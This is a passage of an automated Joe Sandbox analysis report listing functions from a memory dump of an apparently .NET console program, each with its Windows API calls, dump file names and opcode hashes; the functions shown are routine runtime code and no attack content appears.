                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FormatFreeMessage$HeapLocalwcscpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2823936367-0
                                                                                                                                                                                                                          • Opcode ID: d65ddedab398fcbab14650534c468b4ba44ca9aba42a39af801981b423dcdba0
                                                                                                                                                                                                                          • Instruction ID: 28b408b38470df08adaaebc90f510c3505c932cb696caf2a8e1549b7f2c40dda
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d65ddedab398fcbab14650534c468b4ba44ca9aba42a39af801981b423dcdba0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29911675E10629AFDB14DF98C891BEEBBB5FF48320F048119E919AB394D774A905CB80
                                                                                                                                                                                                                          Function 00FEDA10 Relevance: 6.2, APIs: 4, Instructions: 205memorystringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,7CAB6A82,?,?), ref: 00FEDB04
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000003,00000000,7CAB6A82,?,?), ref: 00FEDC46
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 00FEDD26
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 00FEDD4F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeapstrcpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2616603090-0
                                                                                                                                                                                                                          • Opcode ID: be1926efb6de42a502621c812f1d8b609494bedacc269edcad0a779664a26303
                                                                                                                                                                                                                          • Instruction ID: 27e5e398b941cd92493337e0ba9fed00806b9e5cf67f624431a4bd97b4e626df
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be1926efb6de42a502621c812f1d8b609494bedacc269edcad0a779664a26303
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 159189B09012689BDB20CF14DD89BEDBBB4EF18314F5041D8E909AB291DB741F88DF59
                                                                                                                                                                                                                          Function 010896B0 Relevance: 6.1, APIs: 4, Instructions: 144COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: GetProcessHeap.KERNEL32(?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002,00000002), ref: 01215CAC
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000002,?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002), ref: 01215CCA
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(00000008,?,?), ref: 01089711
                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0108977E
                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?), ref: 01089819
                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?), ref: 01089870
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateEvent$Heap$AllocateCriticalInitializeProcessSection
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2365403526-0
                                                                                                                                                                                                                          • Opcode ID: 98a98e6d6f438adbbdeff0bccd3affc7b27a4bbf5dc9aed6e8113e1c377f014c
                                                                                                                                                                                                                          • Instruction ID: c6e1a4833bca5825b3708667ae7b19ccf1280911a2083b4eab9cae29ec57392d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98a98e6d6f438adbbdeff0bccd3affc7b27a4bbf5dc9aed6e8113e1c377f014c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3251CDB0911742EFE720EF69C90479ABBF0BF80714F20475DE590AB2C4E7B6A654CB81
                                                                                                                                                                                                                          Function 011846B0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 142memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?), ref: 01184874
                                                                                                                                                                                                                            • Part of subcall function 00FCDE20: HeapFree.KERNEL32(00000000,?,7CAB6A82,7CAB6A82,?), ref: 00FCDEC8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: Contract details: $Exception Info: $Message:
                                                                                                                                                                                                                          • API String ID: 3298025750-1860525982
                                                                                                                                                                                                                          • Opcode ID: 0dfd6b5d546a772f94fb776b30df24db636354d7bed4f50d6f2b10f77cf269d4
                                                                                                                                                                                                                          • Instruction ID: d2e5a878abea466c0663b9478cbe4d939d6ac46c68d5f956acd4bb42e85b4873
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0dfd6b5d546a772f94fb776b30df24db636354d7bed4f50d6f2b10f77cf269d4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 935157B0900209EFDB14EFA4DA96B9EBBF4FF05704F50812EE405A7681EB746A09CF51
                                                                                                                                                                                                                          Function 01014330 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(7CAB6A82), ref: 01014377
                                                                                                                                                                                                                          • SetLastError.KERNEL32(?,?), ref: 010144E8
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • CLRVectoredExceptionHandlerShim: returning %d, xrefs: 010144C3
                                                                                                                                                                                                                          • CLRVectoredExceptionShim: mismatch of cached and current stack-base indicating use of Fibers, return with EXCEPTION_CONTINUE_SEARCH: current = %p; cache = %p, xrefs: 01014458
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                          • String ID: CLRVectoredExceptionHandlerShim: returning %d$CLRVectoredExceptionShim: mismatch of cached and current stack-base indicating use of Fibers, return with EXCEPTION_CONTINUE_SEARCH: current = %p; cache = %p
                                                                                                                                                                                                                          • API String ID: 1452528299-526770326
                                                                                                                                                                                                                          • Opcode ID: 56058f55a10c8242b747b6ed794593a074dcdf51de926348aabf2f2f696f4fae
                                                                                                                                                                                                                          • Instruction ID: 7c3ebd2abf93cec794cbeb7eb87d34826dd37c77a80fcd4f95b3f4e0cf89ed6c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56058f55a10c8242b747b6ed794593a074dcdf51de926348aabf2f2f696f4fae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35514571A40205EFDB20DFA8DC88B9EBBF4EB18714F1541A9E545FB2A4DB789900CB91
                                                                                                                                                                                                                          Function 01226D20 Relevance: 6.1, APIs: 4, Instructions: 77memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0159BAA1,000000FF,00000000,00000000,7CAB6A82), ref: 01226D8A
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,0159BAA1,000000FF,00000000,00000000,00000000), ref: 01226DBF
                                                                                                                                                                                                                          • OutputDebugStringW.KERNEL32(00000000), ref: 01226DD4
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 01226DF4
                                                                                                                                                                                                                            • Part of subcall function 00FCD660: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,ResumeThread,?,010E288C), ref: 00FCD68B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharFreeHeapMultiWide$DebugOutputString
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3187996580-0
                                                                                                                                                                                                                          • Opcode ID: b69442c885ee9d309d36215e250f276937b321f795ceeeca6610b01825ae0914
                                                                                                                                                                                                                          • Instruction ID: a1c55a34deb99ab0ebbba824753d5d7a636074e862aa943dae8e9a58745220e8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b69442c885ee9d309d36215e250f276937b321f795ceeeca6610b01825ae0914
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0421B272600229BBE7309F65EC48F9FBBB8EB05761F100369F919A72E0DB744900CB90
                                                                                                                                                                                                                          Function 010AAD70 Relevance: 6.1, APIs: 4, Instructions: 66stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000001,?,?,010A9E33), ref: 010AAD9F
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,010A9E33), ref: 010AAD88
                                                                                                                                                                                                                            • Part of subcall function 01215D00: GetProcessHeap.KERNEL32(00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82,00000002), ref: 01215D0C
                                                                                                                                                                                                                            • Part of subcall function 01215D00: RtlAllocateHeap.NTDLL(03BF0000,00000000,?,00000002,00FCFE3B,00000002,?,00000002,00FCF1D3,80131623,?,?,7CAB6A82), ref: 01215D28
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,010A9E33), ref: 010AADF2
                                                                                                                                                                                                                          • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000001,?,?,010A9E33), ref: 010AAE09
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heapstrcpy_sstrlen$AllocateProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 512183944-0
                                                                                                                                                                                                                          • Opcode ID: a4eb6efdf5b125d2da62b2fdc0c3eaefc337b35d2a7b5218f594f97411b0dc98
                                                                                                                                                                                                                          • Instruction ID: f80e225ccdc779f893fc650d969e25e3b7e0d4d1c6cc137b9012333e459a0b33
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4eb6efdf5b125d2da62b2fdc0c3eaefc337b35d2a7b5218f594f97411b0dc98
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4311B4746001019BEF599F59C8889777BA5EF8030638880DCED499F36ACB35D821CFE1
                                                                                                                                                                                                                          Function 00FCD660 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 61memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,ResumeThread,?,010E288C), ref: 00FCD68B
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,00000000,ResumeThread,?,010E288C), ref: 00FCD6BE
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,00000000,ResumeThread,?,010E288C), ref: 00FCD6EE
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: ResumeThread
                                                                                                                                                                                                                          • API String ID: 3298025750-947044025
                                                                                                                                                                                                                          • Opcode ID: de4867a2884ac2e1bc9a544c1c6086971d3ee7aa85b9eb2cae0c5763c5309ef0
                                                                                                                                                                                                                          • Instruction ID: 0b9eeb269f982c11b736e3c7a11d697b37f4faccb8069481b720646e85e63d97
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de4867a2884ac2e1bc9a544c1c6086971d3ee7aa85b9eb2cae0c5763c5309ef0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A511C1B16003029FE3308F0AEA85B2AF7E8EF50311F10843EE59AC3660D7B1A810EB40
                                                                                                                                                                                                                          Function 012261E0 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003), ref: 01226249
                                                                                                                                                                                                                          • VerSetConditionMask.KERNEL32(00000000), ref: 01226251
                                                                                                                                                                                                                          • VerSetConditionMask.KERNEL32(00000000), ref: 01226259
                                                                                                                                                                                                                          • VerifyVersionInfoW.KERNEL32 ref: 01226281
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2793162063-0
                                                                                                                                                                                                                          • Opcode ID: a12a61817cae358d3cd321c950248aa01ec0fc358c115e751a9931aac5ab32ec
                                                                                                                                                                                                                          • Instruction ID: 8b48709f32b8c9f0ef0976a01b719e87cb92626f3989ea2d976b6126a89327ee
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a12a61817cae358d3cd321c950248aa01ec0fc358c115e751a9931aac5ab32ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1111FB15443006FE7309F61DD0ABAB76E8EF98B01F01491DB585D62D0D77456248B96
                                                                                                                                                                                                                          Function 010D8470 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,010D8767,00000000,00000000,00000000,?), ref: 010D848B
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,010E0370,?,00000000,00000001,00000000,?,00000000,00000000,00000000,00000001), ref: 010D8498
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 010D84B7
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 010D84C2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2605342592-0
                                                                                                                                                                                                                          • Opcode ID: 689775aedb3cab57611d593e4167bad485f37e8b5984ae6858c0d72a81785d55
